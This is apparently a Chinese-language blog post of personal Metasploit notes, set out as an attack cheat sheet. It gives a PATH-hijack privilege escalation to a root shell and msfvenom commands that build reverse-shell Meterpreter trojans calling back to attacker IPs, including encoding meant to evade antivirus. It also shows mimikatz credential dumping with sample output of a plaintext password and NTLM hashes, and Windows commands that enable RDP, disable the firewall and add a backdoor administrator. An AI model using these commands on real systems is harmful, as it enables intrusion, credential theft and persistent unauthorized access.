msf使用简记

msfconsole 进去msf终端

search 搜寻漏洞

Exploit 漏洞名称 利用漏洞

set rhost 设计攻击地址

run 执行攻击

shell 获取shell

use 使用制定模块

show options 查看当前参数设置

当返回Meterpreter 提示符时候表示漏洞利用成功

另 关于环境变量提权
Linux 查看拥有root权限的程序 strings查看使用了那些指令
然后在另外的文件夹 用echo 指令把/bin/sh 复制过来 并重新命名(与环境变量相同)
如使用了scp指令
echo "/bin/sh" >scp
然后赋予权限
chmod +x scp
在添加到环境变量中去
export PATH= 目录

然后再去执行改应用程序后 可获得root的shell

使用Meterpreter模块 查看可以使用的漏洞

use Meterpreter

生成攻击木马
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c

-o /home/shell/test01.c
-p 选择payload
-e 选择使用的编码
-i 给payload编码的次数
-b 避免出现的字符
-f 输出文件类型
-o 输出文件目录

免杀方式 生成.c文件后可以自己编译

msf 连接木马

触发木马

使用mimikatz模块读密码
先获取权限
getsystem

查看权限getuid

还可以用migrate迁移进程 至system权限的进程里

migrate uid

加载mimikatz 模块

load mimikatz

msv //获取哈希值

Kerberos //获取明文木密码

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials

AuthID Package Domain User Password


0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP CHENGLEE-PC$
0;49101 NTLM
0;999 NTLM WORKGROUP CHENGLEE-PC$
0;334101 NTLM chenglee-PC chenglee lizhenghua
0;334068 NTLM chenglee-PC chenglee lizhenghua

方法2
mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93

Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid : 501
User : Guest
LM :
NTLM :

Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5

获取明文密码
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

windows 指令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启远程连接端口

--关闭防火墙
netsh advfirewall set allprofiles state off

有权限后也可以自己创建用户进行远程登陆
net user username password /add
net localgroup administrators username /add

msf 内网发现
run get_local_subnets

posted on 2020-08-23 02:05  TaoTao大魔王  阅读(226)  评论(0编辑  收藏  举报